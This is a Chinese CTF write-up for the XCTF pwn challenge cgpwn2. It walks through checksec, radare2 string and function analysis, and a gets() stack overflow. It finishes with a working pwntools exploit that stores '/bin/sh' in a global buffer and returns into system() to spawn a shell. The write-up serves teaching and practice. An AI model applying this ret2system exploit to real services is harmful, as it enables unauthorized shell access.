-
查看安全策略
root@kali:~/ctf/xctf/pwn/easy# checksec easy_008_cgpwn2 [*] '/root/ctf/xctf/pwn/easy/easy_008_cgpwn2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)
-
分析字符串
[0x08048450]> iz [Strings] Num Paddr Vaddr Len Size Section Type String 000 0x00000700 0x08048700 11 12 (.rodata) ascii echo hehehe 001 0x0000070c 0x0804870c 24 25 (.rodata) ascii please tell me your name 002 0x00000728 0x08048728 38 39 (.rodata) ascii hello,you can leave some message here: 003 0x0000074f 0x0804874f 9 10 (.rodata) ascii thank you
未发现
/bin/sh
-
分析函数
[0x08048450]> afl 0x08048450 1 34 entry0 0x08048440 1 6 sym.imp.__libc_start_main 0x08048490 4 42 sym.deregister_tm_clones 0x080484c0 4 55 sym.register_tm_clones 0x08048500 3 30 entry.fini0 0x08048520 4 45 -> 44 entry.init0 0x080486e0 1 2 sym.__libc_csu_fini 0x08048480 1 4 sym.__x86.get_pc_thunk.bx 0x080486e4 1 20 sym._fini 0x08048562 9 162 sym.hello 0x0804854d 1 21 sym.pwn 0x08048420 1 6 sym.imp.system 0x08048670 4 97 sym.__libc_csu_init 0x08048604 1 96 main 0x080483e0 1 6 sym.imp.setbuf 0x08048410 1 6 sym.imp.puts 0x080483a0 3 35 sym._init 0x08048430 1 6 loc.imp.__gmon_start 0x080483f0 1 6 sym.imp.gets 0x08048400 1 6 sym.imp.fgets
发现
sym.imp.system
,同时还发现有sym.__libc_csu_init
这个有万能gadget的函数 -
寻找溢出点
在
sym.hello
中发现一处使用了危险函数gets
| `-> 0x080485bc c704240c8704. mov dword [esp], str.please_tell_me_your_name ; [0x804870c:4]=0x61656c70 ; "please tell me your name" | 0x080485c3 e848feffff call sym.imp.puts | 0x080485c8 a144a00408 mov eax, dword [obj.stdin] ; obj.stdin__GLIBC_2.0 | ; [0x804a044:4]=0 | 0x080485cd 89442408 mov dword [var_8h], eax | 0x080485d1 c74424043200. mov dword [var_4h], 0x32 ; '2' | ; [0x32:4]=-1 ; 50 | 0x080485d9 c7042480a004. mov dword [esp], obj.name ; [0x804a080:4]=0 | 0x080485e0 e81bfeffff call sym.imp.fgets ... | 0x080485f1 8d45da lea eax, dword [var_26h] | 0x080485f4 890424 mov dword [esp], eax | 0x080485f7 e8f4fdffff call sym.imp.gets | 0x080485fc 90 nop
-
构造payload
结合上述分析,在输入name时,输入
/bin/sh
,然后利用溢出点使system执行输入namebinsh = 0x804a080 sym = 0x08048420 payload = 'a' * (0x26 + 0x4) + p32(sym) + p32(0) + p32(binsh)
-
exp
from pwn import * conn = process('./easy-008-cgpwn') binsh = 0x804a080 sym = 0x08048420 payload = 'a' * (0x26 + 0x4) + p32(sym) + p32(0) + p32(binsh) conn.sendlineafter('please tell me your name\n', '/bin/sh') conn.sendlineafter('you can leave some message here:', payload) conn.interactive()
XCTF-简单题-pwn-008-cgpwnj解题记录
最新推荐文章于 2024-06-05 16:45:03 发布